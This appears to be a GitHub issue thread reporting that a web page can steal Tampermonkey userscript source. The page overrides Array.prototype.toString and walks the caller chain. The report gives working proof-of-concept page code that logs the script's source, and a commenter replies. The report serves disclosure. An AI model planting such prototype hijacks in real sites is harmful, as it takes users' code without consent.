### ISSUE TITLE
Function.prototype.caller can be used to steal scripts

### ISSUE THREAD

**Issue by ghost** [Tampermonkey/tampermonkey#2052]
## Expected Behavior
This should not steal the script.

## Actual Behavior
This does steal the script

## Specifications

 Chromium 126.0.6453.0

## Script

```js
// ==UserScript==
// @name         Example script
// @version      2024-05-08
// @description  Example script to demonstrate script stealing.
// @author       You
// @match        http://localhost:8000/main.html
// @grant        none
// ==/UserScript==

let random = [1, 2] + 3; // Implicit .toString, you don't even have to interact with the webpage...
// ... Do stuff
```

## WebSite code:

```js

let oldToString = Array.prototype.toString;
Array.prototype.toString = function hi(args) {
    let caller = arguments.callee.caller;
    while (true) {
        try {
            caller = caller.caller;
        }
        catch (err) {
            console.log(caller?.toString()); // Steals the script
            break;
        }
    }
    return oldToString.apply(this, args); // Returns the toStringed value, so nobody is the wiser...
}
```

## Notes:

I know this can be prevented using `use strict;`, however, I do feel the need that Tampermonkey should implement another protection method for the scripts, because many amateur scripters give away their scripts this way.

**Comment by 7nik** [comment]
But it doesn't leak GM functions or TM secret keys. Technically, calling any page-defined function and even reading a value is a potential way to leak something or, at the very least, reveal the presence of an injected script.
